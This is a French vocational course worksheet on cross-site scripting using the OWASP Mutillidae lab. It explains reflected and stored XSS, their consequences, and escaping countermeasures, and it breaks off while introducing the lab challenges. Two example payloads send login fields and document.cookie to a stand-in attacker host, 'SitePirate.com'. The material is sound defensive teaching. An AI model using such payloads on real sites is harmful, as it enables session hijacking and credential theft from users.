<!-- If the browser does not support frames put the first topic content here --> <div class="WordSection1"> <p class="titredocument"><span style= 'font-size:15.0pt'>Sécurisation des applications <i>Web</i></span></p> <h2><a name="_Toc96200676"><span style='font-size:15.0pt'>Activité 3: Vulnérabilités de type XSS (Cross Site Scripting)</span></a></h2> <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="0" style= 'margin-left:-.85pt;border-collapse:collapse'> <tr style='height:11.25pt'> <td width="125" style= 'width:93.4pt;border:solid navy 1.0pt;border-right:none; background:#6699CC;padding:3.0pt 3.0pt 3.0pt 3.0pt;height:11.25pt'> <p class="Standard" align="center" style='text-align:center'> <span style='font-size:9.0pt;color:white'>Propriétés</span></p> </td> <td width="491" style= 'width:368.35pt;border:solid navy 1.0pt;background:#6699CC; padding:3.0pt 3.0pt 3.0pt 3.0pt;height:11.25pt'> <p class="Standard" align="center" style='text-align:center'> <span style='font-size:9.0pt;color:white'>Description</span></p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Intitulé long</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard">Exploitation d'une plateforme d'apprentissage des vulnérabilités des applications <i>Web</i></p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Intitulé court</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard">Sécurisation des applications <i>Web</i></p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Formation concernée</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard">BTS Services Informatiques aux Organisations</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Matière</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard" style='layout-grid-mode:char'>Bloc 3 : Cybersécurité des services informatiques en deuxième année SLAM</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Présentation</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard">Cet atelier a pour objectif d'exploiter la plateforme d'apprentissage Mutillidae (OWASP) afin de se familiariser avec les principales vulnérabilités des applications web.</p> <p class="Standard">Chaque activité couvre une problématique spécifique (SQLi, XSS, CSRF…) en référence au top 10 des vulnérabilités décrites par l'OWASP (page 4).</p> <p class="Standard">Dans un premier temps, Vous devez réaliser les attaques associées à chaque vulnérabilité.</p> <p class="Standard">Dans un deuxième temps, l’objectif est d’analyser et de comprendre les codes sources des scripts présentés dans leur forme non sécurisée puis sécurisée en tant que contre-mesure.</p> <p class="Standard"> </p> <p class="Standard"><b>Cette troisième activité</b> traite des vulnérabilités de type <i>XSS</i> (<i>Cross Site Scripting</i>). Cette faille arrive en 7ième position dans le classement <i>OWASP</i> 2017.</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Compétences</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard" style= 'margin-left:54.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> Protéger les données à caractère personnel ;</p> <p class="Standard" style= 'margin-left:72.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ○<span style= 'font:7.0pt "Times New Roman"'> </span> Identifier les risques liés à la collecte, au traitement, au stockage et à la diffusion de données à caractère personnel.</p> <p class="Standard" style= 'margin-left:54.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> Garantir la disponibilité, l’intégrité et la confidentialité des services informatiques et des données de l’organisation face à des cyberattaques.</p> <p class="Standard" style= 'margin-left:72.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ○<span style= 'font:7.0pt "Times New Roman"'> </span> Caractériser les risques liés à l’utilisation malveillante d’un service informatique ;</p> <p class="Standard" style= 'margin-left:72.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ○<span style= 'font:7.0pt "Times New Roman"'> </span> Recenser les conséquences d’une perte de disponibilité, d’intégrité ou de confidentialité.</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Savoirs</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard" style= 'margin-left:54.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> Chiffrement, authentification et preuve ; principes et techniques ;</p> <p class="Standard" style= 'margin-left:54.0pt;text-indent:-18.0pt;layout-grid-mode: char'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> Sécurité des applications web : risques, menaces et protocoles.</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Prérequis</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard" style='layout-grid-mode:char'>Commandes de base d’administration d’un système <i>Linux</i>, langages <i>PHP</i> et <i>JavaScript</i>. Dans <a href= "https://www.reseaucerta.org/securisation-des-applications-web-owasp-activite1"> <span style='color:navy;text-decoration:none'>l’activité 1</span></a>, avoir lu la présentation (<i>owasp-presentation-v1.1</i>) et réalisé les installations décrites dans le fichier <i>owasp-mise_en_place-v1.1</i>.</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Outils</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard" style='layout-grid-mode:char'>Deux machines virtualisées (sous Virtualbox) sont fournies avec Linux (Debian 9) comme système d’exploitation.</p> <p class="Standard" style='layout-grid-mode:char'> </p> <p class="Standard" align="left" style= 'text-align:left;layout-grid-mode:char'>Sites officiels :<br /> <a href="https://www.owasp.org/"><span style= 'color:navy;text-decoration: none'>https://www.owasp.org</span></a> et <a href= "https://portswigger.net/burp/communitydownload"><span style= 'color: navy;text-decoration:none'>https://portswigger.net/burp/communitydownload</span></a></p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Mots-clés</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard">OWASP, Mutillidae 2.6.60, BurpSuite 1.7.29, vulnérabilités, SQLi, XSS, IDOR.</p> </td> </tr> <tr style='page-break-inside:avoid'> <td width="125" valign="top" style= 'width:93.4pt;border-top:none;border-left: solid navy 1.0pt;border-bottom:solid navy 1.0pt;border-right:none;padding: 3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard"><b><span style= 'font-size:9.0pt;color:#990033'>Durée</span></b></p> </td> <td width="491" valign="top" style= 'width:368.35pt;border:solid navy 1.0pt; border-top:none;padding:3.0pt 3.0pt 3.0pt 3.0pt'> <p class="Standard">Une heure minimum pour cette activité.</p> </td> </tr> </table> <p class="Standard"> </p> <p class="Standard" style='page-break-before:always'> </p> <p class="MsoToc2"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200676">Activité 3: Vulnérabilités de type XSS (Cross Site Scripting)<span style= 'color:windowtext; text-decoration:none'>.........................</span> <span style= 'color:windowtext;text-decoration:none'>1</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200677">I<span style= 'color:windowtext;text-decoration:none'> </span> Présentation générale<span style= 'color:windowtext;text-decoration:none'>...................................................................</span> <span style= 'color:windowtext;text-decoration:none'>2</span></a></span></p> <p class="MsoToc5"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200678">1<span style= 'color:windowtext;text-decoration:none'> </span> Présentation des failles de type <i>XSS</i><span style= 'color:windowtext;text-decoration:none'>...........................................</span> <span style= 'color:windowtext;text-decoration:none'>2</span></a></span></p> <p class="MsoToc5"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200679">2<span style= 'color:windowtext;text-decoration:none'> </span> Les catégories de failles <i>XSS</i><span style= 'color:windowtext;text-decoration:none'>......................................................</span> <span style= 'color:windowtext;text-decoration:none'>2</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200680">II<span style= 'color:windowtext;text-decoration:none'> </span> Exemples de codes liés à une attaque de type <i>XSS</i><span style= 'color:windowtext;text-decoration: none'>........................</span> <span style= 'color:windowtext;text-decoration:none'>3</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200681">III<span style= 'color:windowtext;text-decoration:none'> </span> Conséquences d’une attaque de type <i>XSS</i><span style= 'color:windowtext;text-decoration:none'>.....................................</span> <span style= 'color:windowtext;text-decoration:none'>5</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200682">IV<span style= 'color:windowtext;text-decoration:none'> </span> Bonnes pratiques<span style= 'color:windowtext;text-decoration:none'>..........................................................................</span> <span style= 'color:windowtext;text-decoration:none'>5</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200683">V<span style= 'color:windowtext;text-decoration:none'> </span> Objectifs et architecture générale de l’activité<span style= 'color:windowtext;text-decoration: none'>.................................</span> <span style= 'color:windowtext;text-decoration:none'>6</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200684">VI<span style= 'color:windowtext;text-decoration:none'> </span> Premier défi : <i>XSS</i> réfléchi via un contexte <i>HTML</i><span style= 'color:windowtext;text-decoration: none'>...........................</span> <span style= 'color:windowtext;text-decoration:none'>8</span></a></span></p> <p class="MsoToc5"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200685">1<span style= 'color:windowtext;text-decoration:none'> </span> Objectif<span style= 'color:windowtext;text-decoration:none'>......................................................................................</span> <span style= 'color:windowtext;text-decoration:none'>8</span></a></span></p> <p class="MsoToc5"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200686">2<span style= 'color:windowtext;text-decoration:none'> </span> À vous de jouer<span style= 'color:windowtext;text-decoration:none'>..........................................................................</span> <span style= 'color:windowtext;text-decoration:none'>8</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200687">VII<span style= 'color:windowtext;text-decoration:none'> </span> Deuxième défi : <i>XSS</i> permanent via une page affichant des <i>logs</i><span style= 'color:windowtext; text-decoration:none'>..</span> <span style= 'color:windowtext;text-decoration:none'>9</span></a></span></p> <p class="MsoToc5"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200688">1<span style= 'color:windowtext;text-decoration:none'> </span> Objectif<span style= 'color:windowtext;text-decoration:none'>......................................................................................</span> <span style= 'color:windowtext;text-decoration:none'>9</span></a></span></p> <p class="MsoToc5"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200689">2<span style= 'color:windowtext;text-decoration:none'> </span> À vous de jouer<span style= 'color:windowtext;text-decoration:none'>..........................................................................</span> <span style= 'color:windowtext;text-decoration:none'>9</span></a></span></p> <p class="MsoToc4"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200690">VIII<span style= 'color:windowtext;text-decoration:none'> </span> Conclusion<span style= 'color:windowtext;text-decoration:none'>...............................................................................</span> <span style= 'color:windowtext;text-decoration:none'>10</span></a></span></p> <p class="MsoToc1"><span class="MsoHyperlink"><a href= "start.htm#_Toc96200691">Dossier 1 : <i>XSS</i> réfléchi via un contexte <i>HTML</i><span style= 'color: windowtext;text-decoration:none'>.............................................</span> <span style= 'color:windowtext;text-decoration:none'>11</span></a></span></p> <p class="Standard"> </p> <h4 style='margin-left:34.0pt;text-indent:-34.0pt'><a name= "_Toc96200677">I<span style= 'font:7.0pt "Times New Roman"'> </span> Présentation générale</a></h4> <h5 style='margin-left:51.05pt;text-indent:-34.05pt'><a name= "_Toc96200678">1<span style= 'font:7.0pt "Times New Roman"'> </span> Présentation des failles de type <i>XSS</i></a></h5> <p class="Standard">Les failles de type <i>XSS</i> (<i>Cross Site Scripting</i>) surviennent lorsqu’une application récupère des données non fiables et les envoie à un navigateur <i>Web</i> sans aucune validation (vérification des données saisies dans les champs, échappement des caractères suspects). À la différence des injections <i>SQL</i>, les failles <i>XSS</i> se caractérisent par l’injection de code <i>HTML</i> ou <i>JavaScript</i> dans des variables mal protégées.</p> <p class="Standard"> </p> <p class="Standard"><i>XSS</i> permet à un attaquant d’exécuter des scripts dans le navigateur <i>Web</i> de la victime, ce qui peut entraîner des détournements de sessions ou des défacements<a href= "start.htm#_ftn1" name="_ftnref1" title=""><span class= "MsoFootnoteReference"><span class= "MsoFootnoteReference"><span style= 'font-size:10.0pt;font-family:"Arial",sans-serif;color:navy'>[1]</span></span></span></a> de sites <i>Web</i>. L’attaquant peut par exemple rediriger l’utilisateur vers des sites <i>Web</i> malveillants.</p> <p class="Standard"> </p> <h5 style='margin-left:51.05pt;text-indent:-34.05pt'><a name= "_Toc96200679">2<span style= 'font:7.0pt "Times New Roman"'> </span> Les catégories de failles <i>XSS</i></a></h5> <p class="Standard"> </p> <p class="Standard">Les failles de type <i>XSS</i> se déclinent en deux principales catégories :</p> <p class="Standard"> </p> <p class="Standard"><b>1 – Les failles <i>XSS</i> réfléchissantes (<i>reflected XSS</i>)</b></p> <p class="Standard"> </p> <p class="Standard"><img width="474" height="250" src= "owasp-activite3_AttaqueXSS_fichiers/image001.gif" align="left" hspace="12" alt="image" /></p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard" align="center" style='text-align:center'> <i> </i></p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard">Ce type de faille cible <b>une seule victime à un instant donné</b>. <b>Le contenu malveillant n’est pas stocké sur le serveur <i>Web</i></b> mais livré à la victime via un lien malveillant. Typiquement, l’attaquant postera un message à la victime via un système de messagerie interne au site <i>Web</i> visé (forum, commentaire de blog…). Ce message contiendra un code malveillant <i>JavaScript</i>. Lorsque la victime ouvrira ce message, le code <i>JavaScript</i> s’exécutera et permettra la récupération de l’identifiant de session de la victime. Le tout étant redirigé vers un serveur <i>Web</i> appartenant à l’attaquant. L’identifiant de session ainsi récupéré va permettre à l’attaquant d’usurper l’identité de la victime sans connaître son mot de passe.</p> <p class="Standard"><b> </b></p> <p class="Standard"><b>2- Les failles <i>XSS</i> persistantes (<i>stored XSS</i>)</b></p> <p class="Standard"> </p> <p class="Standard"><img width="411" height="241" src= "owasp-activite3_AttaqueXSS_fichiers/image002.gif" align="left" hspace="12" alt="image" /></p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard">Ce type de faille <b>va impacter tous les utilisateurs qui vont visiter la page infectée</b>. Dans ce type de faille, l’attaquant va envoyer un contenu malveillant à une application <i>Web</i>, qui va le <b>stocker dans la base de données</b> associée au site <i>Web</i>. Le contenu malveillant sera ainsi retourné dans le navigateur de tous les utilisateurs qui visiteront la page visée. On peut citer l’exemple d’un forum dans lequel les messages des utilisateurs ne sont pas protégés (échappement). Si un membre poste un message contenant du <i>JavaScript</i> alors tous les membres lisant ce message pourront être infectés.</p> <p class="Standard"> </p> <h4 style='margin-left:34.0pt;text-indent:-34.0pt'><a name= "_Toc96200680">II<span style= 'font:7.0pt "Times New Roman"'> </span> Exemples de codes liés à une attaque de type <i>XSS</i></a></h4> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <span style='font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> <b>Exemple n°1 : code <i>JSP</i> (<i>Java Server Pages</i>)</b></p> <p class="Standard"> </p> <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="0" style= 'margin-left:-.25pt;border-collapse:collapse'> <tr> <td width="605" valign="top" style= 'width:453.5pt;border:solid black 1.0pt; padding:2.75pt 2.75pt 2.75pt 2.75pt'> <p class="Standard">string a = (string) request.getParameter(<span style= 'font-family:Ubuntu'>"nom") ;</span></p> </td> </tr> </table> <p class="Standard"><span style= 'font-family:Ubuntu'> </span></p> <p class="Standard"><span style='font-family:Ubuntu'>Dans cet exemple, la valeur récupérée est immédiatement stockée dans une variable et envoyée au navigateur sans encodage (voir plus loin) ou validation.</span></p> <p class="Standard"><span style= 'font-family:Ubuntu'> </span></p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <span style='font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> <b><span style='font-family:Ubuntu'>Exemple n°2 : <i>XSS</i> réfléchissant</span></b></p> <p class="Standard"><span style= 'font-family:Ubuntu'> </span></p> <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="0" style= 'margin-left:-.25pt;border-collapse:collapse'> <tr> <td width="605" valign="top" style= 'width:453.5pt;border:solid black 1.0pt; padding:2.75pt 2.75pt 2.75pt 2.75pt'> <p class="Standard"><span style= 'font-family:Ubuntu'>https://mabanque.com/submitform.do?client=<script> function+VolIdentifiants() {</span></p> <p class="Standard"><span style= 'font-family:Ubuntu'> location.href="www.sitePirate.com?name=document.myform.username.value&password=document.myform.pword.value"</span></p> <p class="Standard"><span style= 'font-family:Ubuntu'>}</script></span></p> </td> </tr> </table> <p class="Standard"><span style= 'font-family:Ubuntu'> </span></p> <p class="Standard">Dans ce deuxième exemple, si la victime clique sur le lien alors elle est redirigée vers la page d’une personne malveillante qui va voler ses identifiants. Plus en détail, le code <i>JavaScript</i> fait appel à une fonction nommée <i>VolIdentifiants()</i>. Cette fonction renvoie vers le site de l’attaquant et transmet le login et le mot de passe capturé via des variables de type <i>GET</i> (<i>name</i> et <i>password</i>) qui pourront être enregistrées par le serveur <i>Web</i> de l’attaquant lors de chaque appel. La récupération du contenu du login et du mot de passe se fait via des commandes <i>DOM</i> de <i>JavaScript</i>. En effet, la représentation de la structure d’une page <i>Web</i> offerte par un navigateur et exploitable via <i>JavaScript</i> est appelée <i>DOM</i> (<i>Document Object Model</i>).</p> <span style= 'font-size:12.0pt;font-family:"Arial",sans-serif'><br clear="all" style='page-break-before:always' /></span> <p class="MsoNormal"><span style= 'font-size:10.0pt;color:navy'> </span></p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <span style='font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> <b>Exemple n°3 : <i>XSS</i> persistant</b></p> <p class="Standard"> </p> <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="0" style= 'margin-left:-.25pt;border-collapse:collapse'> <tr> <td width="605" valign="top" style= 'width:453.5pt;border:solid black 1.0pt; padding:2.75pt 2.75pt 2.75pt 2.75pt'> <p class="Standard"><script></p> <p class="Standard">new image().src= "http://SitePirate.com/login.cgi="+encodeURI(document.cookie);</p> <p class="Standard"></script></p> </td> </tr> </table> <p class="Standard"> </p> <p class="Standard">Dans cet exemple, c’est un lien de type image qui est infecté.</p> <p class="Standard"> </p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <span style='font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> <b>Exemple n°4 : <i>Samy is my hero</i></b></p> <p class="Standard"> </p> <p class="Standard">Samy Kamkar a écrit un code <i>Javascript</i> permettant l’exploitation d’une faille de type <i>XSS</i> persistant ce qui lui a permis d’infecter le site <i>MySpace</i> et d’obtenir plus d’un million de faux amis en moins de 24 heures. A l’époque de la réalisation de cette attaque, les experts en sécurité estimaient que 80 % à 90 % des sites <i>Web</i> étaient vulnérables à ce type d’attaque. Depuis, des correctifs ont été mis en place notamment suite à l’initiative du groupe <i>OWASP</i> qui a publié une <i>API</i> afin que le code des sites en question ne soit plus vulnérable aux vulnérabilités <i>XSS</i>. Le projet a été baptisé <i>Projet AntiSamy</i>.</p> <p class="Standard"> </p> <p class="Standard"> </p> <h4 style='margin-left:34.0pt;text-indent:-34.0pt'><a name= "_Toc96200681">III<span style= 'font:7.0pt "Times New Roman"'> </span> Conséquences d’une attaque de type <i>XSS</i></a></h4> <p class="Standard"> </p> <p class="Standard">Les principales conséquences liées à l’exploitation d’une faille <i>XSS</i> sont les suivantes :</p> <p class="Standard" style='text-indent:-34.0pt'> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <b>1.<span style= 'font:7.0pt "Times New Roman"'> </span></b> <b>Vol du <i>cookie</i> d’identification</b></p> <p class="Standard"> </p> <p class="Standard">L’attaque <i>XSS</i> la plus courante consiste à détourner des comptes d'utilisateurs légitimes en volant leurs <i>cookies</i> de session. Cela permet aux attaquants d'usurper l'identité des victimes et d'accéder à toute information sensible ou fonctionnalité en leur nom.</p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <b>2.<span style= 'font:7.0pt "Times New Roman"'> </span></b> <b>Vol des identifiants de connexion</b></p> <p class="Standard"> </p> <p class="Standard">Un autre vecteur d'attaque pour <i>XSS</i> consiste à utiliser <i>HTML</i> et <i>JavaScript</i> afin de voler les informations d'identification des utilisateurs, au lieu de leurs <i>cookies</i>. Cela peut être fait en clonant la page de connexion de l'application <i>Web</i>, puis en utilisant la vulnérabilité <i>XSS</i> afin de la servir aux victimes.</p> <p class="Standard"><b> </b></p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <b>3.<span style= 'font:7.0pt "Times New Roman"'> </span></b> <b>Accès à des informations sensibles ou réalisation d’opérations interdites</b></p> <p class="Standard"><b> </b></p> <p class="Standard">Un autre vecteur d'attaque puissant pour <i>XSS</i> consiste à l'utiliser pour exfiltrer des données sensibles (par exemple des informations personnelles sensibles ou des données de titulaires de cartes) ou pour effectuer des opérations non autorisées, telles que le siphonnage de fonds dans un panier virtuel sur un site marchand vulnérable. Par exemple un site marchand comportant un panier mal programmé pourra être exploité afin de permettre à l’attaquant de modifier le panier (quantité, prix des produits). <a name="tw-target-text1" id= "tw-target-text1"></a>Concernant le vol d’information, si un attaquant <i>XSS</i> parvient à voler un <i>cookie</i> de session, il peut dupliquer la session active de l'utilisateur et avoir accès à tout ce que l'utilisateur est capable de faire sur un site <i>Web</i> : publier des messages sur les réseaux sociaux, modifier les informations personnelles du compte, changer les mots de passe, voler les informations sur les cartes bancaires, effectuer des virements bancaires, acheter des produits sur un site de commerce électronique, etc.</p> <p class="Standard"> </p> <h4 style='margin-left:34.0pt;text-indent:-34.0pt'><a name= "_Toc96200682">IV<span style= 'font:7.0pt "Times New Roman"'> </span> Bonnes pratiques</a></h4> <p class="Standard"><b>Les bonnes pratiques</b> suivantes peuvent être mises en place en tant que limitations ou contre-mesures des vulnérabilités présentées en amont :</p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <b>1.<span style= 'font:7.0pt "Times New Roman"'> </span></b> <b>Validation des données saisies</b></p> <p class="Standard"> </p> <p class="Standard"><a name="tw-target-text3" id= "tw-target-text3"></a>La première méthode permettant d’empêcher les vulnérabilités <i>XSS</i> est l’échappement des caractères suspects saisis par des utilisateurs. L’échappement de données signifie prendre les données reçues par une application et s’assurer qu’elles sont sécurisées avant de les envoyer vers l’utilisateur final. Cela permet de s’assurer que les données reçues par une page <i>Web</i> ne pourront pas être interprétées de manière malveillante. Par exemple, les caractères suivants seront échappés : <>/ empêchant ainsi l’exécution de code <i>JavaScript</i>. Les caractères à bannir seront placés dans une liste noire. De même, les caractères autorisés doivent être placés dans une liste blanche.</p> <p class="Standard"> </p> <p class="Standard">Exemple avec la fonction <i>PHP htmlentities </i>:</p> <p class="Standard"> </p> <p class="Standard">source : <a href= "https://php.net/manual/fr/function.htmlentities.php"><span style= 'color:navy;text-decoration:none'>https://php.net/manual/fr/function.htmlentities.php</span></a></p> <p class="Standard"> </p> <p class="Standard"><img width="532" height="122" src= "owasp-activite3_AttaqueXSS_fichiers/image003.gif" align="left" hspace="12" alt="image" /></p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> <b>2.<span style= 'font:7.0pt "Times New Roman"'> </span></b> <b>Encodage des données</b></p> <p class="Standard"> </p> <p class="Standard">L’encodage des données va consister à utiliser des fonctions permettant de filtrer des symboles suspects en les remplaçant par leur équivalent <i>HTML</i>. Prenons l’exemple de la fonction <i>htmlspecialchars</i> en <i>PHP</i>. Avec cette fonction, les modifications suivantes sont réalisées :</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:87.05pt;text-indent:-18.0pt'><span style= 'font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> Le caractère " devient &quot ;</p> <p class="Standard" style= 'margin-left:87.05pt;text-indent:-18.0pt'><span style= 'font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> Le caractère ‘ devient &#39.</p> <p class="Standard" style= 'margin-left:87.05pt;text-indent:-18.0pt'><span style= 'font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> </p> <p class="Standard">Exemple avec la fonction <i>PHP htmlspecialchars</i> :</p> <p class="Standard"> </p> <p class="Standard">source : <a href= "https://php.net/manual/fr/function.htmlspecialchars.php"><span style='color:navy;text-decoration:none'> https://php.net/manual/fr/function.htmlspecialchars.php</span></a></p> <p class="Standard"><img width="518" height="104" src= "owasp-activite3_AttaqueXSS_fichiers/image004.gif" align="left" hspace="12" alt="image" /></p> <p class="Standard"> </p> <h4 style='margin-left:34.0pt;text-indent:-34.0pt'><a name= "_Toc96200683">V<span style= 'font:7.0pt "Times New Roman"'> </span> Objectifs et architecture générale de l’activité</a></h4> <p class="Standard"> </p> <p class="Standard">Deux défis sont proposés pour illustrer la problématique des attaques de type <i>XSS :</i></p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 1.<span style= 'font:7.0pt "Times New Roman"'> </span> une attaque <i>XSS</i> de type réfléchissante via un contexte <i>HTML</i> : l’objectif est d’injecter du code <i>JavaScript</i> et de l’exécuter afin de récupérer le <i>cookie</i> d’identification d’une victime;</p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 2.<span style= 'font:7.0pt "Times New Roman"'> </span> une attaque 